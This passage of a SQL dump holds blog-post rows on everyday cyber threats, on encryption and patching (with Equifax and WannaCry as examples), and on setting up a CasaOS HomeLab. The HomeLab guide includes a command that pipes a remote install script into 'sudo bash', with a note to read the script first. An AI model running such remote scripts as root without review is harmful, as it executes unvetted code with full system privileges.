date.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Be Cautious Online</strong></b>: Avoid clicking on unsolicited emails, suspicious links, or visiting unsecured websites.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Stay Updated</strong></b>: Follow trusted cybersecurity blogs and news outlets to stay informed about emerging threats and protection strategies.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Final Thoughts</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While cyber threats are an ongoing challenge, proactive measures and good 
security practices can significantly reduce your risk of falling victim to online attacks. By staying vigilant, keeping your software updated, and using tools like VPNs, RFID blockers, and password managers, you can create a secure digital environment for yourself and your family.</p>', '', NULL, NULL, 1, 'draft', '2025-01-15 18:45:53', '2026-01-12 21:41:44', 'Information Security', 'Protecting Yourself from Everyday Cyber Threats', '', NULL),
(75, 'Unraveling Encryption: The Guardian of Data Security', 'unraveling-encryption-the-guardian-of-data-security', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Data security is among the most pressing challenges in the digital age. With the exponential growth of data generation and the increasing sophistication of cyber threats, protecting sensitive information has become a critical concern for organizations and individuals alike. Enter encryption—the invisible guardian of data security. At its core, encryption is a method of encoding information so only authorized parties can access it, making it an essential tool for safeguarding private and sensitive data.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This blog explores the profound role encryption plays in data security, the paradoxes it can create in cybersecurity patching, lessons from high-profile incidents, and best practices to strengthen defenses against vulnerabilities.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Importance of Encryption in Protecting Sensitive Data</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encryption is a technology powerhouse that underpins modern cybersecurity. 
Think about your online banking transactions, emails, or stored health records; encryption ensures that even if these data sets are intercepted, they remain unreadable to unauthorized users.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Organizations utilize encryption to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Prevent unauthorized access to databases.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Secure communications through encryption protocols like SSL/TLS.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Protect sensitive customer data from breaches.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Meet compliance standards like GDPR and HIPAA, where data encryption is mandatory.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">But while encryption is vital, it isn\'t a standalone solution. It must be part of a broader cybersecurity strategy, including patch management, vulnerability mitigation, and employee training.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybersecurity Patching: A Double-Edged Sword</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Patching is a fundamental aspect of cybersecurity. 
Regular patches ensure that software vulnerabilities, which could serve as entry points for attackers, are identified and resolved. However, patch management poses a paradox in which the very act of patching can sometimes lead to complications.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For instance:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Disruption to Systems</strong></b>: Unanticipated conflicts between new patches and existing systems can cause interruptions or degraded performance.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Failure to Patch in a Timely Manner</strong></b>: Delays in implementing patches can leave organizations exposed to attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Leveraging Exploit Patches</strong></b>: Attackers sometimes reverse-engineer patches to understand and exploit the vulnerability in unpatched systems.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This paradox reinforces the necessity of reliable patching strategies and the integration of encryption at all layers of infrastructure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Lessons from Two Prominent Cybersecurity Incidents</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To better 
understand the role encryption and patch management play in data security, we turn to two high-profile cybersecurity failures that shook the global tech landscape.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Equifax Data Breach (2017)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What Happened</strong></b>: Equifax, one of the largest credit reporting agencies, suffered a catastrophic data breach that exposed the personal details of approximately 147 million individuals. The attackers exploited a vulnerability in the Apache Struts web application framework—one that had a known patch available months earlier.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">What Went Wrong</strong></b>: Equifax’s failure to apply a critical patch to its systems promptly enabled attackers to access encrypted data by exploiting the vulnerability.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Takeaway</strong></b>: The breach could have been mitigated with diligent patch management processes. 
Further, encrypting data at multiple levels could have minimized the exposure of sensitive information, adding an additional layer of security.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">WannaCry Ransomware Attack (2017)</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What Happened</strong></b>: WannaCry, a global ransomware attack, infected over 230,000 computers across 150 countries by exploiting a vulnerability in Microsoft Windows. The vulnerability was patched by Microsoft two months earlier, but countless systems had not applied the update.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">What Went Wrong</strong></b>: A failure to adopt timely patching left systems vulnerable to the EternalBlue exploit, which the ransomware leveraged to spread quickly.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Takeaway</strong></b>: While encryption wouldn’t have prevented infection, encrypting critical systems and files could have limited the damage caused by WannaCry. 
Additionally, an emphasis on proactive vulnerability management and prompt patching could have stopped the ransomware in its tracks.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Cybersecurity Patching and Encryption</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To mitigate vulnerabilities and ensure optimal data protection, organizations should implement a combination of effective patch management and encryption practices. Below are some best practices every organization can adopt:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Cybersecurity Patching</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Establish a Consistent Routine</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Automate patch management processes to ensure timely updates, and schedule regular reviews of system vulnerabilities.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Prioritize Critical Patches</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Not all vulnerabilities pose the same risk. 
Assess vulnerabilities for their risk level and prioritize patches based on potential impact.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Test Before Deployment</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Test patches in a controlled environment to identify potential conflicts or performance issues before full implementation.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Leverage Threat Intelligence</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Stay informed about emerging threats and vulnerabilities by subscribing to threat intelligence platforms to act swiftly on critical updates.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Train Staff</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Make sure employees understand the importance of updates, and avoid postponing patches on individual workstations.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Encryption Practices</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] 
list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Use End-to-End Encryption</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Protect communications by employing end-to-end encryption for messaging and file sharing.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Encrypt Data at Rest and in Transit</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Safeguard all data—even when it\'s stored on devices or transmitted across networks—with robust encryption.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Choose Strong Encryption Protocols</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Adopt well-vetted protocols like AES-256 and RSA-2048 for reliable data security.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Regularly Update Encryption Keys</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Periodically rotate and manage encryption keys using a centralized key 
management system to prevent vulnerabilities.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Conduct Routine Security Audits</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Evaluate your encryption practices and identify areas for improvement through regular security audits.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Critical Role of Encryption and Third-Party Solutions in Securing Cyberspace</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The Equifax and WannaCry incidents highlight not just the need for strong encryption and expedient patch management but also the importance of third-party solutions. Trusted third-party tools for patch automation and advanced encryption can provide expertise and efficiency that many in-house teams may lack.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Data breaches and ransomware attacks are stark reminders of the gaps in modern cybersecurity approaches, but they’re also opportunities to learn and evolve. Enterprises must not only adopt encryption and patch management practices but also build a culture of shared responsibility, in which everyone—from IT admins to executives—understands their role in safeguarding sensitive data.\r\n\r\n</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Encryption acts as the guardian of data security, defending sensitive information from prying eyes. 
But it is most effective when paired with a proactive approach to cybersecurity, including sophisticated patch management and robust vulnerability assessments.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">By understanding the lessons of high-profile cybersecurity incidents like Equifax and WannaCry, organizations can implement solutions that prevent history from repeating itself. For IT professionals, tech enthusiasts, and cybersecurity learners alike, the message is clear—prepare, encrypt, and patch to secure the future of cyberspace.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Looking to deepen your understanding of encryption and implement best practices in your organization? Stay ahead of the curve by exploring advanced cybersecurity strategies and integrating reliable third-party solutions into your framework. The future of data security starts</p>', '', NULL, NULL, 1, 'draft', '2025-01-14 15:00:19', '2026-01-12 21:41:44', 'Information Security', 'Unraveling Encryption: The Guardian of Data Security', '', NULL),
(76, 'Building a Secure HomeLab with CasaOS', 'building-a-secure-homelab-with-casaos', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The digital landscape grows more complex every day, and staying ahead in cybersecurity has never been more important. For IT professionals, cybersecurity learners, and tech enthusiasts, a HomeLab can be a game-changing environment for learning, testing, and innovating. Add CasaOS to the mix—a lightweight yet powerful open-source operating system—and you\'ve got the perfect foundation for building a secure, efficient, and future-ready HomeLab.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This guide will walk you through setting up your HomeLab with CasaOS, using it as a platform for cybersecurity training, and future-proofing it for the digital challenges of tomorrow.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Build a HomeLab?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Creating a HomeLab is like building a personal IT playground. It’s a private setup where you can experiment with IT security measures, prepare for cyber incident response scenarios, tackle cybersecurity training challenges, or even enhance network solutions for small businesses. 
Whether you\'re honing skills for professional growth or testing the latest cybersecurity trends, a HomeLab enables hands-on learning at its best.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">CasaOS takes this a step further with its intuitive interface, Docker support, and scalability, making it an ideal OS for building and managing a HomeLab.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Section 1: Setting Up Your Secure HomeLab</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Choosing the Right Hardware</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">While it’s possible to create a HomeLab with a modest budget, choosing the right hardware is essential. Begin with a machine that balances performance and energy efficiency—such as a repurposed mini-PC, a Raspberry Pi, or a server-grade workstation if your requirements are more intense. Ensure that your hardware supports virtualization and provides ample CPU and RAM for running Docker containers, virtual machines, and other tools CasaOS supports.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Installation and Configuration of CasaOS</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Start by installing CasaOS on your chosen hardware. 
Here\'s a simplified guide to get started:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Visit the <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.casaos.io\">CasaOS website</a> and download the latest release.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Flash the image onto an SD card or USB drive using tools like Rufus or BalenaEtcher.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Connect the storage device to your hardware and boot it into CasaOS.</li>\r\n</ol>\r\nOr just install any Linux OS—Ubuntu works great! Paste this into the terminal (it pipes a remote install script straight into sudo bash, so download and read the script first if you want to check what it runs):\r\n<p style=\"text-align: center\"><code>curl -fsSL https://get.casaos.io | sudo bash</code></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Follow the on-screen instructions, which are beginner-friendly, even for those new to server setups. Once installed, you’ll have access to a clean, modern interface for managing your system.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Securing Your HomeLab Network</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Security is paramount for any HomeLab. 
Implement these measures to keep your setup safe:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Use Strong Passwords:</strong></b> Protect your CasaOS admin panel and other interfaces with robust, unique passwords.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Enable a Firewall</strong></b>: Configure a firewall to restrict unauthorized access to your network.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Segregate Your Network:</strong></b> Use VLANs to segment your HomeLab from your home network to minimize exposure to potential attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Keep Your System Updated:</strong></b> Regularly check and apply updates to CasaOS and any installed software.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Section 2: Utilizing CasaOS for Cybersecurity Training</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">CasaOS Features for Security Testing</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">CasaOS excels in providing tools and features that make cybersecurity testing practical and accessible. 
For example, CasaOS supports:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Docker integration, allowing you to run security tools effortlessly within containers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Virtualized environments that mimic real-world networks for testing attack and defence strategies.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">A centralized interface for managing and monitoring multiple services.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Implementing Docker Containers for Security Challenges</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Docker enhances CasaOS significantly in the context of cybersecurity. 
Containers can be deployed for:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Penetration Testing</strong></b> using tools like Metasploit or Kali Linux.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Vulnerability Scanning</strong></b> with OpenVAS or Nessus containers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Threat Detection</strong></b> by running SIEM systems like Elasticsearch and Kibana.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">You can easily launch and manage these tools within a modular, sandboxed environment.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Best Practices for Cybersecurity Training in a HomeLab</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To maximize training effectiveness, follow these best practices:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Maintain isolation between your training and home networks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Document all experiments, 
